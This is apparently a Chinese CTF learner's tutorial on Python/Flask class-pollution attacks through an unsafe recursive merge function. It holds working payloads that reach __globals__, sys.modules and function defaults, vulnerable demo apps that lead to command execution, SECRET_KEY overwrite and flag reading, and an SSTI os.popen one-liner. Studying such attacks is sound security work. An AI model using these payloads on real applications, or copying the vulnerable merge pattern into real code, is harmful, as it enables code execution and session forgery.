flask原型链污染

0x01 前言

baseCTF里面的那几道我都是现学现做,只是知道污染怎么操作,并不知道为啥可以污染,这次让我彻底弄懂它!

0x02 question

父子类的继承

概念

父类是被继承的类,也称为基类或超类。父类中的属性和方法会被子类继承。

子类是从父类继承而来的类,也称为派生类。子类可以拥有父类的所有属性和方法,还可以添加新的属性和方法,或者重写父类的方法。

同时还有几个重要方法,这里直接引用一位师傅所写的

  • 在Python中,定义类是通过class关键字,class后面紧接着是类名,紧接着是(object),表示该类是从哪个类继承下来的,所有类的本源都是object类
  • 可以自由地给一个实例变量绑定属性,像js
  • 由于类可以起到模板的作用,因此,可以在创建实例的时候,把一些我们认为必须绑定的属性强制填写进去。通过定义一个特殊的__init__方法,在创建实例的时候,就把类内置的属性绑上
  • 注意到__init__方法的第一个参数永远是self,表示创建的实例本身,因此,在__init__方法内部,就可以把各种属性绑定到self,因为self就指向创建的实例本身。
  • 当我们定义了一个类属性后,这个属性虽然归类所有,但类的所有实例都可以访问到
  • 判断一个变量是否是某个类型可以用isinstance()判断。

普通继承

在子类中,你可以使用 super() 函数来调用父类的方法。这在子类需要扩展而不是完全重写父类方法时特别有用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
class Animal:
def __init__(self, name):
self.name = name

def speak(self):
raise NotImplementedError("Subclass must implement this abstract method")

def eat(self):
print(f"{self.name} is eating.")


class Dog(Animal):
def __init__(self, name, breed):
super().__init__(name) # 调用父类的构造函数
self.breed = breed

def speak(self):
print(f"{self.name} says Woof!")

def fetch(self):
print(f"{self.name} is fetching the ball.")


class Cat(Animal):
def __init__(self, name, color):
super().__init__(name) # 调用父类的构造函数
self.color = color

def speak(self):
super().speak() # 调用父类的 speak 方法
print(f"{self.name} says Meow!")

def scratch(self):
print(f"{self.name} is scratching the furniture.")


instance = Cat("无情","black")
print(instance.name)

看看就行感觉没啥好讲的,看就能看懂

多重继承

一个子类可以继承多个父类

1
2
3
4
5
6
7
8
9
10
11
class Flyer:
def fly(self):
print(f"{self.name} is flying.")

class Bird(Animal, Flyer):
def __init__(self, name, species):
super().__init__(name) # 调用父类的构造函数
self.species = species

def speak(self):
print(f"{self.name} chirps.")

方法的解析顺序我们靠mro()来查看

1
2
print(Bird.mro())
# [<class '__main__.Bird'>, <class '__main__.Animal'>, <class '__main__.Flyer'>, <class 'object'>]

计算规则是这样

  1. 子类优先于父类:子类的方法和属性优先于父类的方法和属性。
  2. 父类的顺序:如果一个类有多个父类,那么这些父类的顺序会保持不变。
  3. 唯一性:MRO 列表中的每个类只出现一次。

但是这个实际的作用我还不知道是有啥,可能是效率问题?

污染过程解析

先看个最简单的demo

1
2
3
4
5
6
7
class test():
pass


a=test()
a.__class__='polluted'
print(a.__class__)

这里直接污染发现报错了

1
TypeError: __class__ must be set to a class, not 'str' object

那么此时我们如果要污染属性的话就去寻找其内置属性即可,__qualname__是用于访问类的名称

1
2
3
4
5
6
7
8
class test():
pass


a=test()
print(a.__class__)
a.__class__.__qualname__='polluted'
print(a.__class__)

而也就是说污染其实就是赋值,那么为了搞清楚原理,我们自己写段代码来调试就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
class father:
secret="hello"
class son_a(father):
pass
class son_b(father):
pass
def merge(src,dst):
for k,v in src.items():
if hasattr(dst,'__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
setattr(dst,k,v)

instance=son_b()
payload={
"__class__":{
"__base__":{
"secret":"world"
}
}
}

print(son_a.secret)
print(instance.secret)

merge(payload,instance)
print(son_a.secret)
print(instance.secret)

然后进行debug就可以懂了,这里我还是自己试一次,毕竟是初学者

但是我发现个问题,我使用VScode始终进入不了merge函数,那没办法,我就下载一个pycharm吧,不过先讲讲函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)

欧克那么下来我们开始调试,打断点在merge(payload,instance)

1

可以看到我们的键为'__class__',值为{'__base__':{'secret':'world'}},下一步由于dst不为字典直接到了elif

2

继续之后,发现键为'__base__',值为{'secret':'world'}

3

仍然是跳回到了这一步,继续看,再回来时,键为'secret',值为'world',现在的值已经不是字典了,所以直接跳转到了setattr,进行赋值

4

赋值之后还有一个东西,请看jpg

5

6

可以看到此时也是dst直接就指向地址了

那么我们就成功的通过当前类的__base__去污染了secret(现在这三个类的secret都是world),不过这仅仅只是一个内置属性,那能不能实现最大的利用直接污染object

前面几步都在正常进行,可是到了后面,发现个问题,也就是我们刚才所有的回退那两步发现没了,从而直接报错,也就是说污染失败,得出结论

object的属性不能污染

不过那回退那三步,又是怎么回事呢,我们再写一个多层的来试试,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
class father:
secret = "hello"
nested = {
"level1": {
"level2": {
"level3": "initial_value"
}
}
}

class son_a(father):
pass

class son_b(father):
pass

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

instance = son_b()
payload = {
"__class__": {
"__base__": {
"secret": "world",
"nested": {
"level1": {
"level2": {
"level3": "updated_value",
"new_level4": "new_value"
},
"new_level5": "new_value"
}
}
}
}
}

print(son_a.secret)
print(instance.secret)
print(instance.nested)

merge(payload, instance)
print(son_a.secret)
print(instance.secret)
print(instance.nested)

换成这个代码进行debug发现会在原地跳伍次

找规律都找的出来了吧,就是因为我们的payload深度所导致的,查找payload深度的方法

3

这样子debug,看看什么时候会完全的往外跳,记录下跳的次数即为payload深度

不过这样的话又要牵扯到python的循环了,那么查找官方文档,其中我们知道

循环是进行迭代调用的,从一个最简单的demo

1
2
3
4
num=[1,2,3,4,5]

for i in num:
print(i)

这里进行调试会发现,每次进入之后跳出循环都会在for i in num:跳一下

那么回到我们的test

1
2
3
4
5
6
7
8
9
10
11
def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

这里第一次通过elif进入merge函数,第二次也是,总共合起来就是三次循环,所以跳出时,也是需要原地跳三次才可跳出

那么再看一个最简单的demo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from flask import Flask, request, jsonify
import os

app = Flask(__name__)

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and isinstance(v, dict):
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and isinstance(v, dict):
merge(getattr(dst, k), v)
else:
setattr(dst, k, v)

class Demo:
def __init__(self, cmd):
self.cmd = cmd

def execute(self):
return os.popen(self.cmd).read()

@app.route('/merge_and_execute', methods=['POST'])
def merge_and_execute():
data = request.json
if not data or 'cmd' not in data:
return jsonify({"error": "Invalid input"}), 400

cmd_data = data['cmd']
a = Demo('echo Hello')
merge(cmd_data, a)

result = a.execute()
return jsonify({"result": result})

if __name__ == '__main__':
app.run(host='127.0.0.1',debug=True)

直接污染cmd就可以RCE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST /merge_and_execute HTTP/1.1
Host: 127.0.0.1:5000
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Length: 24
Content-Type: application/json

{"cmd":{"cmd":"whoami"}}

属性污染以及寻找

这里就神似SSTI中我们如何寻找可利用的方法了

原型链

如上面的,通过继承关系写出poc即可,当然与此同时,并不只是我们自定义的属性可以污染,还有内置属性也可以,这里可以以这个属性为例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
class father:
secret = "hello"


class son_a(father):
pass


class son_b(father):
pass


def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)


instance = son_b()
payload = {
"__class__": {
"__base__": {
"secret": "world",
"__str__":"polluted!"
}
}
}
print(father.__str__)
merge(payload,instance)
print(father.__str__)

成功污染,好玩好玩

非继承

globals

我们在flask中进行SSTI注入的时候一般就会先去寻找globals,这里也是一样,我们直接去找就行了,不过注意的一点就是,如果我们不进行重写__init__的话,是找不到的

未重写

1
2
3
4
5
6
7
8
9
10
11
12
class MyClass:
pass

print(type(MyClass.__init__))
try:
print(MyClass.__init__.__globals__)
# 访问不存在的属性会抛出AttributeError
except AttributeError as e:
print(e)

# <class 'wrapper_descriptor'>
# 'wrapper_descriptor' object has no attribute '__globals__'

重写过后

1
2
3
4
5
6
7
8
class MyClass:
def __init__(self):
self.x = 10

print(type(MyClass.__init__))
print(MyClass.__init__.__globals__)
# <class 'function'>
# {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x000001BDD0B71700>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': 'D:\\PyCharm 2023.3.2\\object\\pythonProject\\test.py', '__cached__': None, 'MyClass': <class '__main__.MyClass'>}

同时这里我们也发现,当其未被重写时,它的类型是 wrapper_descriptor,没有__globals__,被重写会变为function,有__globals__,请看demo

1
2
3
4
5
6
7
def demo():
pass
class MyClass:
def __init__(self):
pass

print(demo.__globals__ == globals() == MyClass.__init__.__globals__)

说了这么多别给你说迷糊了,我们的目的就是得到__globals__,OK那么继续看

从SSTI的角度(flask)

1
{{cycler.__init__.__globals__.__builtins__['__import__']('os').popen('whoami').read()}}

那么我们进入cycler源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
class Cycler(MutableSequence):
def __init__(self, **kwargs):
self._keys = []
self._length = 1
self._by_key = {}
for key, val in kwargs.items():
if not hasattr(val, '__getitem__') or not hasattr(val, '__len__'):
raise TypeError(f"{key!r} does not support indexing/length")
self._keys.append(key)
self._by_key[key] = val
self._length = lcm(self._length, len(val))
self._index = 0

# 其他方法省略...

很明显看到__init__是被重写了的,其他的不放了(太长了)

那么我们为啥要找这个东西,这再说说

{{ cycler.__init__.__globals__ }} 会返回 cycler 模块中 Cycler 类的 __init__ 方法的全局命名空间。这个全局命名空间是一个字典,字典的内容如下

  1. 内置函数和模块:如 __builtins__
  2. 导入的模块:如 math(如果 cycler 模块导入了 math 模块)。
  3. 定义的类和函数:如 Cycler 类本身,以及其他在 cycler 模块中定义的类和函数。
  4. 其他全局变量:如 cycler 模块中定义的其他变量。

理清楚了,来看demo,直接利用__globals__污染属性和类属性

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
name="baozongwi"

class son_a():
secret="nonono"

class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)

a=son_a()
b=son_b()

payload={
"__init__":{
"__globals__":{
"name":"12SqweR",
"a":{
"secret":"good!!!"
}
}
}
}
print(name)
print(a.secret)

merge(payload,b)
print(name)
print(a.secret)

这里我们就成功污染了,但是实际情况中,常常是存在于内置模块或者是第三方模块之中,此时我们就不太好找关系了。不过还是有很多办法的

sys

那么就要使用sys,因为sys模块的modules属性以字典的形式包含了程序自开始运行时所有已加载过的模块,可以直接从该属性中获取到目标模块,并随着模块的导入而动态更新。

test.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import sys
import son

class son_a():
secret="nonono"

class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)

payload={
"__init__":{
"__globals__":{
"sys":{
"modules":{
"son":{
"son_test":{
"secret":"good!!!"
}
}
}
}
}
}
}
b=son_b()

print(son.son_test.secret)
merge(payload,b)
print(son.son_test.secret)

son.py

1
2
class son_test:
secret="nonono"

这里就以导入第三方块示例了

Loader加载器

__loader__ 是一个属性,它存在于每个已导入的模块对象中。这个属性指向一个加载器对象,该对象负责加载该模块。在一些场景中常常伴有着importlib模块的使用,那么这个时候我们就可以使用loader加载器来进行sys模块的加载从而达到目的

2

加载器这个东西可以简单看看

**BuiltinImporter**:

1
2
3
import math
print(math.__loader__)
# <class '_frozen_importlib.BuiltinImporter'>
  • 用于加载内置模块(如 mathsys 等)。

**SourceFileLoader**:

1
2
3
import son   # 自定义模块才行
print(son.__loader__)
# <_frozen_importlib_external.SourceFileLoader object at 0x0000020819FA10D0>
  • 用于加载来自文件系统的模块。

**ExtensionFileLoader**:

1
2
3
import numpy
print(numpy.__loader__)
# <_frozen_importlib_external.SourceFileLoader object at 0x000001C8DC2710D0>
  • 用于加载扩展模块(如 C 语言编写的扩展模块)。

只要是BuiltinImporter的加载器都行,所以这里还有spec也能用

2

那么来看demo吧

son.py

1
2
class son_test():
secret="nonono"

test.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import importlib
import son

class son_a():
secret="nonono"

class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
print("sys" in dir(__import__("importlib")))
payload={
"__init__":{
"__globals__":{
"importlib":{
"__loader__":{
"__init__":{
"__globals__":{
"sys":{
"modules":{
"son":{
"son_test":{
"secret":"good"
}
}
}
}
}
}
}
}
}
}
}
b=son_b()

print(son.son_test.secret)
merge(payload,b)
print(son.son_test.secret)

然后__spec__

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import math
import son

class son_a():
secret="nonono"

class son_b():
def __init__(self):
pass
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)

payload={
"__init__":{
"__globals__":{
"math":{
"__spec__":{
"__init__":{
"__globals__":{
"sys":{
"modules":{
"son":{
"son_test":{
"secret":"good"
}
}
}
}
}
}
}
}
}
}
}
b=son_b()

print(son.son_test.secret)
merge(payload,b)
print(son.son_test.secret)

大家比照一下,很明显__spec__限制更少,我在实验的时候用math的loader来加载sys,结果弄半天后面一直不成功,于是看看有没有结果false

1
print("sys" in dir(__import__("math")))

函数形参默认值替换

__defaults__是一个元组,用于存储函数或方法的默认参数值。当我们去定义一个函数时,可以为其中的参数指定默认值。这些默认值会被存储在__defaults__元组中。我们可以通过这个属性来污染参数默认值

1
2
3
4
5
def a(x,y=2,z=3):
pass

print(a.__defaults__)
# (2,3)

这是一个函数,有三个参数,其中一个必填参数(x),还有两个是可选参数(yz),再多看看,把__default__看懂

1
2
3
4
5
def func_b(var_1, var_2):
pass

print(func_b.__defaults__)
# None

那么再来看个特殊的

  1. / 之前的参数
    • 这些参数是 位置参数(positional-only parameters)。
    • 它们只能通过位置传递,不能通过关键字传递。
  2. /* 之间的参数
    • 这些参数既可以是 位置参数,也可以是 关键字参数
    • 它们可以通过位置或关键字传递。
  3. * 之后的参数
    • 这些参数是 关键字参数(keyword-only parameters)。
    • 它们只能通过关键字传递,不能通过位置传递。
    • 有默认值但是不计入__defualts__
1
2
3
4
5
def a(x,/,y=2,*,z=3):
pass

a(x=1)
# TypeError: a() got some positional-only arguments passed as keyword arguments: 'x'
1
2
3
4
5
def a(x,/,y=2,*,z=3):
pass

a(1,4,6)
# TypeError: a() takes from 1 to 2 positional arguments but 3 were given
1
2
3
4
5
6
def a(x,/,y=2,*,z=3):
print(x,y,z)
pass

a(1,4,z=6)
print(a.__defaults__)

欧克懂了之后来污染吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def demo(x,name="baozongwi",age="99"):
if name != "12SqweR":
print(x)
else :
if age != "99":
print(__import__("os").popen(x).read())
class A:
def __init__(self):
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
a=A()
b=demo
payload={
"__init__":{
"__globals__":{
"demo":{
"__defaults__":
("12SqweR","100")
}
}
}
}
print(b.__defaults__)

merge(payload,a)
print(b.__defaults__)
c=demo("whoami")

这个__defaults__的写法一定要对,是元组,不然就失败,当然如果是True或者False的话,就可以直接写

这里给看看我的错误写法,

1

首先我加了大括号,不是元组,然后modules里面还只有模块,所以直接鸭溪啦

后来我查看一些污染类文章发现用sys一样可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import sys

def demo(x, name="baozongwi", age="99"):
if name != "12SqweR":
print(x)
else:
if age != "99":
print(__import__("os").popen(x).read())

class A:
def __init__(self):
pass

def merge(src, dst):
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

a = A()
b = demo
payload = {
"__init__": {
"__globals__": {
"sys": {
"modules": {
"__main__": {
"demo": {
"__defaults__": ("12SqweR", "100")
}
}
}
}
}
}
}

print(b.__defaults__) # 输出: ('baozongwi', '99')

merge(payload, a)
print(b.__defaults__) # 输出: ('12SqweR', '100')

c = demo("whoami")

除了__defaults__还有__kwdefaults__,大差不差,只不过这个是字典,cancan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def func_a(var_1, var_2 =2, var_3 = 3):
pass

def func_b(var_1, /, var_2 =2, var_3 = 3):
pass

def func_c(var_1, var_2 =2, *, var_3 = 3):
pass

def func_d(var_1, /, var_2 =2, *, var_3 = 3):
pass

print(func_a.__kwdefaults__)
#None
print(func_b.__kwdefaults__)
#None
print(func_c.__kwdefaults__)
#{'var_3': 3}
print(func_d.__kwdefaults__)
#{'var_3': 3}

发现只有关键字参数的默认值才会返回

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
def demo(x,*,name="baozongwi",age="99"):
if name != "12SqweR":
print(x)
else :
if age != "99":
print(__import__("os").popen(x).read())

class A:
def __init__(self):
pass
def merge(src,dst):
# 遍历字典中的所有键值对
for k,v in src.items():
# 检查dst是否为字典
if hasattr(dst,'__getitem__'):
# 如果存在键k并且v是一个字典
if dst.get(k) and type(v) == dict:
merge(v,dst.get(k))
else:
dst[k]=v
# 如果dst是一个对象并且有属性k
elif hasattr(dst,k) and type(v) == dict:
merge(v,getattr(dst,k))
else:
# 将v赋值给k
setattr(dst,k,v)
a=A()
b=demo
payload={
"__init__":{
"__globals__":{
"demo":{
"__kwdefaults__": dict(name="12SqweR",age="100")
# "__kwdefaults__": {"name":"12SqweR","age":"100"}
}
}
}
}
print(b.__kwdefaults__)

merge(payload,a)
print(b.__kwdefaults__)
c=demo("whoami")

关键信息替换

session_key

有些时候当我们不知道key的时候,并且审计代码或者尝试,发现可以污染的时候,那我们可以直接污染为自己想要的可控值,那么此时session就可以任意伪造了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from flask import Flask,request
import json

app = Flask(__name__)
app.config['SECRET_KEY']="who are you"
def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
print(app.config['SECRET_KEY'])
if request.data:
merge(json.loads(request.data), instance)
return "[+]Config:%s"%(app.config['SECRET_KEY'])

app.run(host="0.0.0.0")

直接污染

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
POST / HTTP/1.1
Host: 127.0.0.1:5000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Type: application/json
Content-Length: 189

{
"__init__":{
"__globals__":{
"app":{
"config":{
"SECRET_KEY":"mine"
}
}
}
}
}

_got_first_request

这里对版本有要求我们给自己降个级

1
2
3
4
5
pip install werkzeug==2.0.3
pip install Flask==2.1.0

pip install --upgrade werkzeug
pip install --upgrade Flask

等会升级回来就好了

_got_first_request 是 Flask 应用内部的一个属性,用于跟踪是否已经处理了第一个请求。这个属性主要用于实现 before_first_request 装饰器的功能,但在 Flask 2.2.0 版本中,before_first_request 装饰器已经被移除,因此 _got_first_request 也失去了其主要用途。

就是场景就是有些时候为了安全,会只允许一些特定操作,比如必须在before_first_request 装饰器实现一些东西,看看这个装饰器的源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
class Flask(WerkzeugApp):
# ... 其他代码 ...

def __init__(self, import_name, static_url_path=None, static_folder='static',
static_host=None, host_matching=False, subdomain_matching=False,
template_folder='templates', instance_path=None,
instance_relative_config=False, root_path=None):
# ... 初始化代码 ...
self.before_first_request_funcs = []
# ... 其他初始化代码 ...

def before_first_request(self, f):
"""Register a function to be run before the first request only."""
self.before_first_request_funcs.append(f)
return f

def _got_first_request(self):
if self._got_first_request:
return
self._got_first_request = True
for func in self.before_first_request_funcs:
func()

def process_response(self, response):
"""Can be overridden in order to modify the response object before it's sent to the client."""
# ... 其他代码 ...
self._got_first_request()
# ... 其他代码 ...
return response

def preprocess_request(self):
"""Called before the actual request dispatching and will ensure that
:meth:`before_request` functions and URL value matching are done. If
this returns a response the regular request handling is skipped and the
returned response is sent instead.
"""
# ... 其他代码 ...
self._got_first_request()
# ... 其他代码 ...
return None

主要就是这里

1
2
3
4
5
6
def _got_first_request(self):
if self._got_first_request:
return
self._got_first_request = True
for func in self.before_first_request_funcs:
func()

也就是说我们如果要调用这个装饰器中的函数,必须让_got_first_requestfalse

这里我们如果可以污染的话就非常good

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from flask import Flask,request
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

flag = "Is flag here?"

@app.before_first_request
def init():
global flag
if hasattr(app, "special") and app.special == "U_Polluted_It":
flag = open("flag", "rt").read()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
global flag
setattr(app, "special", "U_Polluted_It")
return flag

app.run(host="0.0.0.0")

还要创建一个flag文件,自己随便来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST / HTTP/1.1
Host: 127.0.0.1:5000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
Connection: close
Content-Type: application/json
Content-Length: 145

{
"__init__":{
"__globals__":{
"app":{
"_got_first_request":false
}
}
}
}

这里还有一个点,就是因为版本问题false必须写成这样子,而不是False

_static_url_path

这个属性用于定义静态文件的目录,默认情况下,Flask 会从 static 文件夹中提供静态文件。所以我们只要污染这个属性就可以进行目录穿越

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
class Flask(WerkzeugApp):
def __init__(self, import_name, static_url_path=None, static_folder='static',
static_host=None, host_matching=False, subdomain_matching=False,
template_folder='templates', instance_path=None,
instance_relative_config=False, root_path=None):
# ... 其他初始化代码 ...

if static_url_path is not None:
self._static_url_path = static_url_path
else:
self._static_url_path = '/static'

if static_folder is not None:
self.static_folder = static_folder
else:
self.static_folder = 'static'

# ... 其他初始化代码 ...

查了一下,_static_folder控制了实际静态文件所在位置,我们自己起环境试试

1
2
3
4
5
<html>
<h1>hello</h1>
<body>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from flask import Flask,request
import json

app = Flask(__name__)

def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)

class cls():
def __init__(self):
pass

instance = cls()

@app.route('/',methods=['POST', 'GET'])
def index():
if request.data:
merge(json.loads(request.data), instance)
return "flag in ./flag but heres only static/index.html"


app.run(host="0.0.0.0")

